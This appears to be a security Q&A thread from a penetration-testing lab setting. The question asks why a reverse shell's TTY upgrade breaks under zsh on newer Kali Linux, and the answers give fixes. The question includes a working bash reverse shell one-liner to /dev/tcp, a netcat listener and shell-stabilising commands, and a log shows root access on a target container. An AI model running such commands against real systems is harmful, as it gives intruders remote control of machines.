1

I successfully got a reverse shell:

nc -lnvp 8000 # in Kali
/bin/bash -i >& /dev/tcp/192.168.6.1/8000 0>&1 # in the victim machine

I tried to upgrade it in the standard way:

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg
export TERM=xterm

However, after running stty raw -echo and bringing the reverse shell back to the foreground with fg, the reverse shell doesn't working properly. When I press the ENTER button to attempt to run a command, then it prints ^M. Since the ENTER button doesn't work, I can't run any commands and I can't use the shell.

I know the commands are correct, because it used to work, but after upgrading to the latest Kali Linux, it doesn't work anymore.

Full output of terminal session when trying to upgrade the shell:

┌──(user㉿kali)-[~/exercises/htb]
└─$ nc -lnvp 8000
listening on [any] 8000 ...
connect to [10.0.2.15] from (UNKNOWN) [172.17.0.2] 46138
root@9070f0e8043f:/# id 
id
uid=0(root) gid=0(root) groups=0(root)
root@9070f0e8043f:/# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
root@9070f0e8043f:/# ^Z
zsh: suspended  nc -lnvp 8000
┌──(user㉿kali)-[~/exercises/htb]
└─$ stty raw -echo                                                         148 ⨯ 1 ⚙
┌──(user㉿kali)-[~/exercises/htb]
                                     └─$                                             fg                          
[1]  + continued  nc -lnvp 8000
                               export TERM=xterm^M^M
schroeder
  • 123,438
  • 55
  • 284
  • 319
user3207874
  • 225
  • 2
  • 11

2 Answers2

3

The reason why it doesn't work in Kali Linux is because the latest Kali uses the zsh shell by default, not bash. To get it to work, you just have to make sure you're using the bash shell.

To temporarily switch to a bash shell, run the following command in your terminal:

exec bash --login

You can confirm if you're using bash by running:

ps -p $$

In the terminal which uses bash, run the listener and run the commands to upgrade the shell:

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg
export TERM=xterm

As long as you're using bash and not zsh, it will work.

user3207874
  • 225
  • 2
  • 11
2

for zsh change it to....

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo; fg
enter
export TERM=xterm-256color

no need to downgrade your shell. :)

k3nundrum
  • 21
  • 1
  • Struggled for days with my reverse shell and finally found this answer, thanks ! For everyone, what actually mattered for me was "stty raw -echo; fg". It MUST be on one line to prevent having the ^M after. Thx again ! – thibon Sep 02 '22 at 13:58